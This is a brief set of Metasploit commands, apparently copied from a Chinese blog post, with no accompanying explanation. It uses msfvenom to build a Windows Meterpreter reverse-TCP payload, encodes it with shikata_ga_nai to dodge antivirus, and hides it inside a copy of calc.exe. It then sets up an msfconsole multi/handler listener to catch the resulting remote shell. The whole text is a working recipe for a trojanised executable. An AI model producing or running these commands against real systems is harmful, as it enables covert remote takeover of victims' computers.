msf payload

#client
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.8.106 LPORT=9999 -e x86/shikata_ga_nai -b 'x00' -x /root/demo/calc.exe -f exe > demo.exe

#server:
msfconsole
msf>
use exploit/multi/handler
set LHOST 192.168.8.106
set LPORT 9999
show options
exploit -z -j

原文地址:https://www.cnblogs.com/sprinng/p/6534381.html